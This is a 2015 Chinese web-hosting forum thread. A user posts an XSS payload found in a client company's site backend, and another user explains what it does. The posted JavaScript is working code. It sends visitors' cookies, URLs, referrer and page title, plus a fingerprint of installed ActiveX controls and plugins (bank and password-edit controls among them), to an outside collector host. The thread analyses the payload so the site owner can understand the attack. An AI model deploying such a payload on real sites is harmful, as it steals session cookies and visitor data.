设为首页收藏本站
切换到宽版

全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

全球主机交流论坛»论坛 主机综合交流 美国VPS综合讨论 请教高手这段xss代码的作用
CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
返回列表 发新帖
查看: 3220|回复: 8

[Windows VPS] 请教高手这段xss代码的作用

[复制链接]
Captain
发表于 2015-1-13 23:45:27 | 显示全部楼层 |阅读模式
有个客户企业网站后台被xss了,特有此问


  2. var x=new Image();
  3. try
  4. {
  5. var myopener='';
  6. myopener=window.opener && window.opener.location ? window.opener.location : '';
  7. }
  8. catch(err)
  9. {
  10. }
  11. x.src='http://xss.re/XSS/?do=api&act=r&id=2603&diy[location]='+escape(document.location)+'&diy[toplocation]='+escape(top.document.location)+'&diy[cookie]='+escape

  13. (document.cookie)+'&diy[opener]='+escape(myopener)+'&diy[referrer]='+escape(document.referrer)+'&diy[title]='+escape(document.title);var activexa = new Array(
  14.   "Flash Player 8|ShockwaveFlash.ShockwaveFlash.8|classID",
  15.   "Flash Player 9|ShockwaveFlash.ShockwaveFlash.9|classID",
  16.   "360Safe|360SafeLive.Update|classID",
  17.   "Alibaba User(AliEdit)|Aliedit.EditCtrl|classID",
  18.   "CMB Bank|CMBHtmlControl.Edit|classID",
  19.   "Apple IPOD USER|IPodUpdaterExt.iPodUpdaterInterface|classID",  
  20.   "Apple iTunes|iTunesAdmin.iTunesAdmin|classID",
  21.   "JRE 1.7|JavaWebStart.isInstalled.1.7.0.0|classID",
  22.   "JRE 1.6(WebStart)|JavaWebStart.isInstalled.1.6.0.0|classID",
  23.   "KMPlayer|KMPlayer.TKMPDropTarget|classID",
  24.   "KingSoft Word(�ʰ�)|KSEngine.Word|classID",
  25.   "Windows live Messanger|Messenger.MsgrObject|classID",
  26.   "Nero|NeroFileDialog.NeroFileDlg|classID",
  27.   "Nokia Cellphone|NokiaCL.PhoneControl|classID",
  28.   "PPlayer|PPlayer.XPPlayer|classID",
  29.   "Tencent QQ|Qqedit.PasswordEditCtrl|classID",
  30.   "QuickTime|QuickTime.QTElementBehavior|classID",
  31.   "Symantec Anti-Virus|Symantec.stInetTransferItem|classID",
  32.   "Xunlei|XunLeiBHO.ThunderIEHelper|classID"
  33. );

  35. function iescan(){
  36.           var mytmp;
  37.           var plus;
  38.           var bar;
  39.           var x=new Image();
  40.           for (i=0; i<activexa.length; i++){
  41.                   mytmp = activexa[i].split('|');  
  42.                   if ( checkobj(mytmp[1]) == true ){
  43.                               plus+="|"+mytmp[0]+"<br>";
  44.                                   
  45.                   }
  46.           }
  47.          bar = escape(plus);
  48.         x.src='http://xss.re/XSS/?do=api&act=r&id=2603&a=cplus&plus='+bar+'&diy[location]='+escape(document.location)+'&diy[toplocation]='+escape(top.document.location)+'&diy[cookie]='+escape(document.cookie)+'&diy[opener]='+escape(document.myopener)+'&diy[referrer]='+escape(document.referrer)+'&diy[title]='+escape(document.title);

  50. }


  53. function checkobj(objName){
  54.         try {
  55.                   var Obj = new ActiveXObject(objName);
  56.                   return true;
  57.   } catch (e){
  58.                         return false;
  59.   }
  60. }
  61. //-------------
  62. function check_plus() {
  63.         var plus = "";
  64.         var bar = "";
  65.         var b=new Image();
  66. var num_of_plugins = navigator.plugins.length;
  67. for (var i=0; i < num_of_plugins; i++) {
  68.          plus+= navigator.plugins[i].name+"&nbsp;|&nbsp;"+ navigator.plugins[i].filename +"<br>";
  69.    }
  70.     bar = escape(plus);
  71.     b.src='http://xss.re/XSS/?do=api&act=r&id=2603&a=cplus&plus='+bar+'&diy[location]='+escape(document.location)+'&diy[toplocation]='+escape(top.document.location)+'&diy[cookie]='+escape(document.cookie)+'&diy[opener]='+escape(myopener)+'&diy[referrer]='+escape(document.referrer)+'&diy[title]='+escape(document.title);

  73. }

  75. function MyPlusCheck() {

  77.         if(!+[1,]){
  78. iescan();
  79. }else{
  80.    check_plus();
  81. }
  82. }
  83. setTimeout("MyPlusCheck()", 3000);
复制代码
回复

举报

雨宫音羽
发表于 2015-1-14 00:18:04 | 显示全部楼层
似乎是获取访问者的相关信息。。包括在此站的cookie referrer 浏览器插件 访问的页面URL以及标题 通过生成一个伪图片src让浏览器发送到xss.re

点评

Captain
+1  发表于 2015-1-14 03:42
回复 支持 反对

举报

Captain
 楼主| 发表于 2015-1-14 01:43:45 | 显示全部楼层
雨宫音羽 发表于 2015-1-14 00:18
似乎是获取访问者的相关信息。。包括在此站的cookie referrer 浏览器插件 访问的页面URL以及标题 通过生成 ...

多谢,应该是也有获取登录站点cookies里密码的效果?
回复 支持 反对

举报

雨宫音羽
发表于 2015-1-14 02:00:40 | 显示全部楼层
Captain 发表于 2015-1-14 01:43
多谢,应该是也有获取登录站点cookies里密码的效果?

cookie都获取到了 里面啥东西那肯定也一起过去了。。
回复 支持 反对

举报

Captain
 楼主| 发表于 2015-1-14 03:38:45 | 显示全部楼层
雨宫音羽 发表于 2015-1-14 02:00
cookie都获取到了 里面啥东西那肯定也一起过去了。。

只限制这个站点的cookies,还会不会涉及到本地计算机其他隐私信息?
回复 支持 反对

举报

雨宫音羽
发表于 2015-1-14 05:24:48 | 显示全部楼层
如果是只有这些代码的话那就只有我说的那些信息没别的

毕竟都只是“正常”使用Javascript。。没搞溢出之类的...
回复 支持 反对

举报

Captain
 楼主| 发表于 2015-1-14 16:40:35 | 显示全部楼层
雨宫音羽 发表于 2015-1-14 05:24
如果是只有这些代码的话那就只有我说的那些信息没别的

毕竟都只是“正常”使用Javascript。。没搞溢出之类 ...

嗯嗯,中间还有一段很多软件的代码是什么含义?
回复 支持 反对

举报

雨宫音羽
发表于 2015-1-14 16:45:00 | 显示全部楼层
Captain 发表于 2015-1-14 16:40
嗯嗯,中间还有一段很多软件的代码是什么含义?

检测浏览器插件的
回复 支持 反对

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-4-26 05:56 , Processed in 0.061671 second(s), 9 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表